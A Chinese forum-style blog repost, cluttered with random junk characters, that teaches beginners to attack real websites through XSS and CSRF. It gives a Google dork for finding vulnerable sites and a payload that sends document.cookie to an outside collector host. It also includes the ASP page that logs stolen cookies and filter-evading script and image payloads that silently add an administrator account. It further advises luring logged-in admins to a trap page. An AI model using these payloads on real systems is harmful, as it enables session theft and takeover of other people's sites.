前天贴吧一位朋友发了个后台XSS利用的帖子,大家就一起讨论了讨论,原帖为: ' `5 \2 R4 h( v8 [
$ H/ P7 w, k! ?1 q% {; i7 z) o
http://tieba.baidu.com/f?kz=1069007239
; `9 ], T( U: V" C1 W/ k* Z& |/ @" G6 j0 e# h' i$ n* f
这个帖子说的只是一个思路,不是很详细,并且说的是利用后台XSS挂马的情况,但是其实在后台挂马一般是不会牵扯到XSS的,只是一个过滤不过滤转换不转换的问题,比如很多带编辑器的后台,都是不过滤不转换在文章中的html代码的,比如eweb,你可以直接编辑发表文章的时候的html代码,这就为挂马、盗cookie提供了很多机会。9 `& J# Z2 _% J8 f) L/ b8 h+ }
4 v' s' {' g$ T0 J! k- F6 T6 b
但是,我想说的是,即使是挂马、盗cookie,也是不会使用location这种手法的,因为这样太明显了,一般都是使用普通挂马的手法的,比如iframe、JS等等。
' G& K3 t! l X- A. W1 R/ f" _7 l1 ]
( a+ g% {- Z$ K6 N" O我在上边的帖子中说作者讲的不是很详细,希望出一个详细点的利用教程,于是今天又一位朋友就发了一个详细些的文章,我这里就发大博客里,让更多需要的朋友看到这篇文章。
d8 U2 i# y. X" W$ z* C! M6 K' Z$ {
这个文章是对XSS的一个很简单的利用,原理很简单,主要用于科普,只是想让朋友们知道,XSS并不是简单的弹个框框玩那么简单的,是有很多利用价值的,在国外,XSS已经被列为网站杀手之一,包括国内的很多大站,大家都把心思放到了防范SQL注入上,相应的对XSS的防范就很少,这也是XSS总是能成功的原因之一。
: d+ V, \0 P) t3 |3 U; l' U. y. ~+ U' A( b# K T3 z7 H" Z7 ?
好了,废话不多说了,一起来看文章吧。% Y# j$ H: O8 A
' [6 B5 y& J9 |) d: H! N F# l
-------------------------------------------------------------------, L" F4 o# T/ `8 N M* b! Z' c
" I( e8 a6 w4 R9 F' B首先要找到一个有XXS的站,这里就不整什么大站了,谷歌一下inurl:'Product.asp?BigClassName',搜出来的命中率也比较高。随便找一个,先<script>alert('xxs')</script>一下。呵呵,框框出来了。- \/ y( o4 {9 v5 V
) o+ F6 P+ j5 }# k( i- X
% @) B# E4 K7 Q1 j" B7 }9 T
1 O A0 m; x4 f t2 j' S
再看看自己的Cookie吧,把alert里面的内容换成document.cookie就可以了,如图:
9 ]; b; _& i! D' \6 H: o, G! x3 u% D% C8 A0 }% [3 Q0 q
2 T* |3 q4 s7 d$ H2 F3 h4 A6 n9 l/ P
% G e7 n4 K1 b这里就是要把弹出来框框里的东西收集到我们的记事本里。这里,要玩这个步骤就需要一个你自己的站点,具体思路就是
! _- j; G$ j( Q1:让目标访问已跨站的网址,然后这个网址执行脚本: F# Q3 ]. o0 H
2:然后跳转到你已经写好专门用来收集Cookie的网址# D* f6 d8 L5 ~; g) i% P/ l. u
" s, |" o3 {9 u5 Z' d具体实现方法:
" @. W1 a$ s* \4 B% K先构造语句<script>window.open('http://dlgyi.rrvv.net/cookie.asp?msg='+document.cookie)</script>
6 q6 r3 Q7 J; B0 ^9 M, Z3 H这句话意思是打开一个新的窗口,访问http://dlgyi.rrvv.net/cookie.asp这个网址,并且通过msg传递一个变量,这里的变量就是我们要收集的cookie了。3 ]6 o1 @2 O+ z; m
: M5 b8 w) Y5 j1 D4 _这里需要自己写一个页面,也就是收集对方发过来cookie的页面,代码是这样的:
1 h: g( z9 z* J% y _/ K; g! I$ c L K q5 x1 Q
<html>
0 O" c8 a9 i( d<title>xx</title>
. y$ Q! r/ N% y: ~6 X% @6 I0 m<body>/ v, t' d# j3 U5 {, B5 e/ \# C
<%/ n% }; r6 x3 H; L1 a
testfile = Server.MapPath("code.txt") //先构造一个路径,也就是取网站根目录,创造一个在根目录下的code.txt路径,保存在testfile中 r( D: K$ g: W- {" X+ e9 J
msg = Request("msg") //获取提交过来的msg变量,也就是cookie值- C) t4 S+ i, {" d, q1 l' j, R
set fs = server.CreateObject("scripting.filesystemobject")创建一个fs对象9 g0 t) l' K3 l' y2 ~$ s
set thisfile = fs.OpenTextFile(testfile,8,True,0)
* Q1 |( x# X/ ]& w; T" ^( ethisfile.WriteLine(""&msg&"")//像code.txt中写入获取来的cookie
' {# ^$ m+ j/ o& ithisfile.close //关闭8 @) p' [ F* D' r
set fs = nothing. [: \% Q7 Y: x! W5 t1 P, S
%>
l& A& G4 p3 b, |' z, R0 ^</body>
7 H, s; x; Z4 Z5 U( x1 a</html>
4 ~ _- E1 o" [9 S4 I% }/ {8 c) O. C3 o; R0 f% X J0 w1 h
然后保存,放在你自己服务器上,如果有人点击构造好的XXS页面,就会自动在你网站的根目录生成一个文本:* D4 O3 ~8 E- p3 q5 j5 A
" J2 @2 V6 v8 c2 h' s' A) S
, c, _* I" z1 B5 {
: b9 w0 d8 }" {
% g% D5 v- Z6 }1 d; K拿出来看看,呵呵,Cookie到手:/ k0 n: m2 [. R" F: m
) V& E9 `' @/ @; a; f
4 m$ Q! ^- W, Y F" X- V5 M- Q* x* B: t% t1 Z0 a9 c- v
本文只是抛砖引玉,而且没有多大的实战价值,一来很多网站都过滤掉了+号这个字符连接符,二来稍大点的站,也不会存在如此的XXS,本文旨在给新手一个练习的向导,毕竟不可能谁一开始学习就可以RI掉大站,从小站开始练手,一起进步。话说咱也是新手O(∩_∩)O~
; a( O3 g- d& J, p% C! ~* \% r# m# E: s. L% S
PS:一点小提示,如果提交<script>alert('xxs')</script>网站没有反应时,不要立刻就点X。你可以鼠标右击,查看一下网站的源码,看看网站到底过滤掉了什么字符,通过编码啊神马的发挥下智慧,绕过过滤。只要出现小框框,咱就胜利了。$ C( n% _5 N% c+ \
" \% G" @% i6 h& `1 ^-------------------------------------------------------------------; a6 X* ]5 |+ Y/ ~% O
/ h; h% f- Q X" M' u7 N0 {* ?下面是我对这个帖子的回复,也一起贴过来吧:; E1 A+ q9 R% c$ R2 F+ \
: u: e- Q* J( W7 L$ S' G" }, Q
说实话,像这种后台XSS其实作用不大的,一般的小站你拿到cookie也没什么利用价值,大点的站的话,或许可以用cookie盗点装备什么的,但那牵扯的多了,不过对于普通脚本小子来说,日站的时候除非毫无办法了还会想到XSS的,不过日站时候的XSS利用方法跟这篇文章里讲的差不多的,可以借鉴一下。
3 h* s' U- W& X# E: x
0 T0 @5 o% o( o8 X& o/ L; f但是,这里的文章讲的是针对已经进入后台、拿shell无望又想多获得点东西的情况,说它鸡肋的原因是,你知道的,现在大部分站都是cookie+session的,并且一般用户名和密码不会直接放到cookie里了,这是它鸡肋的原因。
- f: [# `+ b5 x0 M( d S% p5 U. h' @再者,日站的时候盗cookie一般是想进后台,但是如果遇到网上有源码的情况的话,还可以进一步利用,比如添加个管理员什么的。
( I1 @' `- k2 z4 e! Y4 o
4 L& Y1 I. {* b2 ^( L& e9 z4 F在文章的最后,顺便贴上一般XSS的利用思路,也不是原创,原文链接:
9 Y" I, {+ c: I! d" P- @$ J
! W1 h" b7 i3 q) `, n7 Ehttp://user.qzone.qq.com/673116767/blog/1252452536+ [! J' ]6 s) j1 J$ j- z5 x
* L% @# g( k! G! c7 @
一般发现一个xss漏洞后要做的基本上就是这些:( u, g( x- t# W0 L& `. |
8 D/ B1 t$ B2 {- J% R/ r" t2 ^5 j
1. 伪造请求 使用$_REQUEST或$_GET
I1 {2 T' R# q" y5 l( \
6 N* Y) z! ?- f首先我们要找找该网站使用的程序是不是在网上能找到源码,如果能找到源码的话,就去分析后台管理员更改密码或者增加管理员的页面,然后分析管理员使用的是不是$_REQUEST接收参数,如果是的话,我们使用该XSS漏洞构造一个请求,比如前台发表留言中可以使用HTML代码,那么我们就嵌入一个IMG元素:7 m, \; T$ \/ T) U1 ^& g
<img src="/admin/admin_add.asp?name=xxx&psd=yyy" />
+ q5 N6 ?, R0 i* s: y当管理员登录管理后台后看到包含img的页面的时候,就伪造了一个增加后台管理员的请求,而该请求是由管理员发出的,所以顺利的增加了一个新的管理员。
1 N/ s( E0 [8 x1 d2 C1 p0 {% r/ Z/ X) M5 V2 ?
如果是可视文本编辑器,可以尝试使用输入:
8 I% D" L. @4 r$ J2 u8 Bhttp://www.drvfan.com/xxx.jpg" onload="window.open('/admin/admin_add.asp?name=xxx&psd=yyy')# I. A. A4 f7 ?/ | R$ |
这样最终会构造出:
X s( C& ?/ t: ?" I [<img src="http://www.drvfan.com/xxx.jpg" onload="window.open('/admin/admin_add.asp?name=xxx&psd=yyy',0,0)" />
9 [3 \ K) ?6 l/ i总之要举一反三。+ y3 f$ u1 j% Q4 B" _! v
5 |0 {8 Y6 y- M
2. 伪造请求 使用$_POST/ f7 ?& ~, F2 e. L0 d7 B+ R
U' Z! J4 b0 b' S0 [当后台接收增加管理员或更改管理密码的变量时使用的是$_POST方式,那么第一种方法无效,我们视情况而定,如果没有过滤<script>,我们可以通过ajax方式来伪造请求,如:1 w$ ?* k9 M3 Z: {0 t# S7 ?9 Q
<sc/*xss*/ript type="text/javascript">) v/ y- x$ ?2 ]; }
var aj = new ActiveXObject("MSXML2.XMLHTTP.3.0");
% Y' x+ |$ u% H: ^aj.open("POST", "/admin/admin_add.asp", false);5 B7 @7 n j; ^$ f
var postdata = 'name=xxx&psd=yyy';: E' i* f B7 \* ^7 q+ A
aj.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); m1 |- Y/ W3 H% ^( e/ n, K
aj.send(postdata); U! l1 z, P2 G# {- e
</scr/*xss*/ipt>) t' J ]) Q) F8 y- u/ x
/*xss*/是HTML注释,用来绕过简单的对script代码块的过滤。
3 n3 J. o$ y+ K5 o0 x
" t4 P; y6 U0 O8 \3 h( i& Y# t3. 跨站伪造请求 使用$_GET 或 $_REQUEST
0 `, [, {. d& s4 G5 @
$ x/ Y- Q) ?# o与第一种伪造请求的方式相似,但是第一种伪造请求是利用站内的xss漏洞进行的,而跨站伪造请求,是站外发起的,比如我在我的博客的首页放了这样一个图片( }" F; t. \2 \6 P9 U
<img src="http://www.drvfan.com/admin/admin_add.asp?user=xxx&psd=yyy"/>
3 F0 T! o) A- A( G5 |( j c然后我跑到dvbbs上发帖子,“勾引”动网论坛的管理员来我的博客,如果动网论坛的管理员已经登录了他的管理后台,然后使用共享进程的浏览器(目前基于ie内核的myie,maxton等等还有firefox都是共享进程的)来访问我的博客,那么他的后台就会被加入一个用户。
9 t: D1 |6 ]- |" z
6 m3 T; V+ m% c+ \6 j0 W( x4.跨站伪造请求 使用$_POST(0day)
0 O$ Q- w) y- X# g2 l4 V; m3 ^2 X2 [
如果入侵目标的管理后台使用的是$_POST方式来接受变量,那么我们无法在我们的网站跨站使用ajax的post方式提交数据过去,因为ajax是无法跨域的。
[' T; q, Q. M2 G3 T& ]2 \+ P
- p! \, l$ L ?3 B) P4 D但是我们可以在我们的网站放一个form,里面填写好数据,form的action为要利用的有漏洞的页面,然后当有人打开该页面的时候,我们就用js控制该form进行submit,ajax虽然不能跨域,但向域之外的地址提交form总是可以的。
4 S( D. k6 I9 E3 c1 K6 `# o' x
! U: z4 e- ^! u2 z$ h总之,第3,4种方法成功几率要小一些,因为我们要想办法让已经登录自身后台的管理员,使用共享session的浏览器访问我们的伪造请求的页面,有一点社会工程学的技术含量。
9 f. |9 }& e+ E1 f! a0 X5 m/ @" k* _ E+ G3 I4 F ?7 j5 O
OK,该说的都说完了,Over。: P2 J2 X" _+ v
|